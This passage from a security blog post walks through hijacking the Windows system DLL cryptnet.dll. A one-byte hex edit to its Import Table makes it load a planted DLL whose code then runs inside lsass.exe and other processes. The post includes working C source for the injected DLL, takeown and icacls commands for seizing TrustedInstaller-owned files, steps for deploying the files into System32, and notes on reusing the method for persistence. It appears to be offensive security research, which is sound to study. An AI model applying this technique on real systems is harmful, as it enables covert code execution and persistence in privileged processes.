ANYWAY - WE WANT to see what happens OURSELVES - instead of making self-limiting assumptions, so we won't let the presence of the signature deter us. Also, in case the system decides that integrity is more critical than availability and decides to break, we have a snapshot of the PoC development VM.

The second factor worth considering when choosing the target DLL is the presence of an Import Table entry we would feel convenient replacing (will become self-explanatory).

So, let's choose C:\Windows\System32\cryptnet.dll (sha256: 723563F8BB4D7FAFF5C1B202902866F8A0982B14E09E5E636EBAF2FA9B9100FE):

Now, let's view its Import Table and see if there is an import entry which is most likely not used - at least during normal operations. Therefore such an entry is the safest to replace (I guess now you see where this is going). We could as well ADD an import table entry, but this is a bit more difficult, introduces more changes into the target DLL and is beyond this particular blog post.

Here we go:

api-ms-win-core-debug-l1-1-0.dll with its OutputDebugStringA is a perfect candidate.

As Import Tables contain only one reference to each particular DLL name, all relevant functions listed in the Import Table simply refer to that DLL name within the table.

Hence, if we replace a DLL that has multiple function entries in the Import Table, we would have to either proxy multiple functions or lose functionality and risk breaking something (depending on how lazy we are).

Thus, a DLL from which only one function is imported is a good candidate. If the DLL+function is a dependency that has most likely already been resolved by the original executable before it loaded the DLL we are modifying, it's even better. If it is a function that is most likely not to be called during normal operations (like debugging-related functions), it's perfect.

Now, let's work on a copy of the target DLL and apply a super l33t offensive binary hacking technique - hex editor. First, let's find the DLL name (we simply won't care about the Import Table structure):

Searching for the DLL name in the Import Table using HxD

Got it, looks good:

Looks like we found it

Now, our slight modification:

Now, just changing ONE byte, that's all we need

So now our api-ms-win-core-debug-l1-1-0.dll became api-ms-win-code-debug-l1-1-0.dll.

Let's confirm the Import Table change in PEView:

Now, let's fire up our favorite software development tool and create api-ms-win-code-debug-l1-1-0.dll with our arbitrary code.

DevC++, new project, DLL, C

Using a very simple demo, grabbing the current module name (the executable that loaded the DLL) and its command line, appending it into a txt file directly on C: (so by default only high integrity/SYSTEM processes will succeed):

One thing, though - in order for the GetModuleFileNameA() function from the psapi library (psapi.h) to properly link after compilation, -lpsapi needs to be added to the linker parameters:

Code can be copied from here https://github.com/ewilded/api-ms-win-code-debug-l1-1-0/blob/master/dllmain.c.
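For reference, the core of such a DLL can be sketched roughly as follows (a simplified approximation of the linked code, not a verbatim copy; in this sketch kernel32's GetModuleFileNameA is enough to get the host image path):

#include <windows.h>
#include <stdio.h>

// Export named to match the hijacked Import Table entry (see below for why
// it is OutputFebugString rather than OutputDebugString).
__declspec(dllexport) void OutputFebugString(const char *lpOutputString)
{
    (void)lpOutputString; // never expected to actually be called
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    if (fdwReason == DLL_PROCESS_ATTACH)
    {
        char image_path[MAX_PATH];
        // NULL module handle = the EXE that loaded us (e.g. lsass.exe).
        GetModuleFileNameA(NULL, image_path, MAX_PATH);
        FILE *f = fopen("C:\\poc.txt", "a");
        if (f)
        {
            fprintf(f, "%s : %s\n", image_path, GetCommandLineA());
            fclose(f);
        }
    }
    return TRUE;
}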

OK, compile. Now, notice we used one export, called OutputFebugString (instead of OutputDebugString). This is because the linker would complain about the name conflict with the original OutputDebugString function that will get resolved anyway through other dependencies.

But since I wanted to have the Export Table in the api-ms-win-code-debug-l1-1-0.dll to match the entry from the cryptnet.dll Import Table, I edited it with HxD as well:

Fixing it

After:

Fixing it
Done

Normally we might want to test the DLL with rundll32.exe (but I am going to skip this part). Also, be careful when using VisualStudio, as it might produce an executable that by default will be x86 (and not x64) and for sure will produce an executable requiring visual C++ redistributables (even for a basic hello world-class application like this), while we might want to create portable code that will actually run on the target system.

What we are expecting to happen

We are expecting the lsass.exe process (and any other process that imports anything from cryptnet.dll) to load its tampered (by one byte!) version from its original location in spite of its digital signature being no longer valid (but again, lsass.exe and cryptnet.dll are just examples here).

We are also expecting that, once loaded, cryptnet.dll will resolve its own dependencies, including our phony api-ms-win-code-debug-l1-1-0.dll, which in turn, upon load (DllMain() execution) will execute our arbitrary code from within lsass.exe process (as well as from any other process that loads it, separately) and append our C:\poc.txt file with its image path and command line to prove successful injection into that process.

Deployment

OK, now we just need to deploy our version of cryptnet.dll (with the one Import Table entry hijacked with our phony api-ms-win-code-debug-l1-1-0.dll) along with our phony api-ms-win-code-debug-l1-1-0.dll itself into C:\Windows\System32\.

For this, obviously, we need elevated privileges (high integrity administrator/SYSTEM).

Even then, however, in this case we will face two problems (both specific to C:\Windows\System32\cryptnet.dll).

The first one is that C:\Windows\System32\cryptnet.dll is owned by TrustedInstaller and we (assuming we are not TrustedInstaller) do not have write/full control permissions for this file:

The easiest way to overcome this is to change the file ownership and then grant privileges:
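One way to do it from an elevated prompt (adjust the group name on localized systems):

takeown /F C:\Windows\System32\cryptnet.dll
icacls C:\Windows\System32\cryptnet.dll /grant Administrators:F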

The second problem we will most likely encounter is that the C:\Windows\System32\cryptnet.dll file is currently in use (loaded by multiple processes).

The easiest workaround for this is to first rename the currently used file:

Then deploy the new one (with hijacked Import Table), named the same as the original one (cryptnet.dll).

The screenshot below shows both new files deployed after having the original one renamed:

Showtime

Now, for diagnostics, let's set up procmon by using its cool feature - boot logging. Its driver will log events from the early stage of the system start process, instead of waiting for us to log in and run it manually. That boot log itself is, by the way, a great read:

Once we click Enable Boot Logging, we should see the following prompt:

We simply click OK.

Now, REBOOT!

And let's check the results.

This looks encouraging:

Oh yeah:

Let's run procmon to filter through the boot log. Upon running we should be asked for saving and loading the boot log, we click Yes:

Now, the previous filter (Process name is lsass.exe and Operation is Load Image) confirms that our phony DLL was loaded right after cryptnet.dll:

One more filter adjustment:

To once more confirm that this happened:

Why this can be fun

DLL side loading exploitation

This approach is a neat and reliable way of creating "proxy" DLLs out of the original ones (that differ by no more than one byte). Then we might only need to proxy one or a few functions, instead of worrying about proxying all/most of them.

Persistence

Introducing injection/persistence of our own code into our favorite program's/service's EXE/DLL.

All with easy creation of the phony DLL (just write in C) and a simple byte replacement in an existing file, no asm required.
